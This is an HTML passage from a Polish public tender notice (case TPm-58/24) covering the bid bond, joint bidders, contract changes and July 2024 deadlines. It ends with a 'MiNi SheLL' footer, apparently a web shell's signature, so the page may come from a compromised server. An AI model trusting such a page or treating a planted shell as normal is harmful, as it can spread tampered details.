Załącznik nr 6 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Do oferty Wykonawca dołączy przedmiotowe środki dowodowe:<br/>Dokument, „Koncepcja realizacji przedmiotu zamówienia”, w którym zostanie zaprezentowane <br/>odniesienie do każdego z segmentów, opisanych w kryterium – „Wartość merytoryczna oferty”.<br/>Postać oraz treść przedstawionej dokumentacji są dowolne (z zastrzeżeniem postaci pisemnej). <br/>Akceptowalna jest w tym wersja opisowa oraz prezentacja. Dokumentacja może zawierać wszelkiego <br/>rodzaju diagramy, wykresy oraz zestawienia itp.). Wykonawca powinien zadbać, by opis zamieszczony <br/>w dokumencie był spójny i wyczerpujący.<br/>Wykonawcy, który wraz z ofertą nie dostarczy dokumentu zawierającego Wartość merytoryczną <br/>oferty, zostanie przyznane 0 punktów w tym kryterium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 4000,00 zł<br/>Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku <br/>następujących formach, w zależności od wyboru Wykonawcy:<br/>1) W pieniądzu, przelewem na rachunek bankowy: BH w Warszawie O/Poznań, <br/>35 1030 1247 0000 0000 4772 4198. Tytułem: Wadium nr sprawy TPm-58/24. <br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 <br/>listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. <br/>299).<br/>Wadium w formie poręczeń lub gwarancji:<br/>1) wnoszone jest w formie gwarancji lub poręczenia, o których mowa w pkt 2 ppkt 2–4 powyżej, <br/>Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>2) powinno być wystawione na Zamawiającego.<br/>3) koniecznym jest, aby gwarancja lub poręczenie obejmowały odpowiedzialność <br/>za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone <br/>w art. 98 ust. 6 Ustawy. Wadium to musi być bezwarunkowe, realizowane na pierwsze żądanie <br/>Zamawiającego. <br/>Zamawiający informuje, że zgodnie z art. 97 ust. 1 Ustawy wadium wnosi się przed upływem terminu <br/>składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą. Oznacza to, że w <br/>przypadku wniesienia wadium w postaci gwarancji bankowej lub ubezpieczeniowej okres jej <br/>obowiązywania rozpoczyna się z dniem składania ofert i upływa <br/>z upływem terminu związania ofertą z zastrzeżeniem, że gwarancja musi umożliwiać skuteczne <br/>zaspokojenie roszczeń zamawiającego w razie spełnienia przesłanek zatrzymania wadium. Wobec <br/>powyższego Zamawiający zaleca wniesienie gwarancji z dłuższym terminem obowiązywania lub <br/>wskazanie w jej zapisach, że zgłoszenie roszczeń jest dopuszczalne <br/>po upływie terminu jej ważności, jeżeli tylko zdarzenie uzasadniające zatrzymanie wadium miało <br/>miejsce przed upływem terminu związania ofertą.<br/>Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć <br/>na wskazany w pkt. 2. ppkt 1) powyżej, rachunek bankowy Zamawiającego, najpóźniej przed <br/>upływem terminu składania ofert.<br/>W tytule przelewu, a także treści poręczenia lub gwarancji Wykonawca winien umieścić nazwę <br/>przedmiotu zamówienia, którego dotyczy wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2) W przypadku, o którym mowa w podpunkcie 1, Wykonawcy ustanawiają pełnomocnika <br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3) Jeżeli oferta Wykonawców występujących wspólnie została wybrana, Zamawiający żąda przed <br/>zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych <br/>Wykonawców. <br/>4) Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia.<br/>5) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o <br/>których mowa w pkt 19 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak <br/>podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, <br/>w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>6) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z <br/>którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy, zgodnie <br/>z art. 117 ust. 4 Pzp.<br/>7) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa <br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zawarty jest w załączniku nr 1 do SWZ - projekt umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/ump</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-12 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-09</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com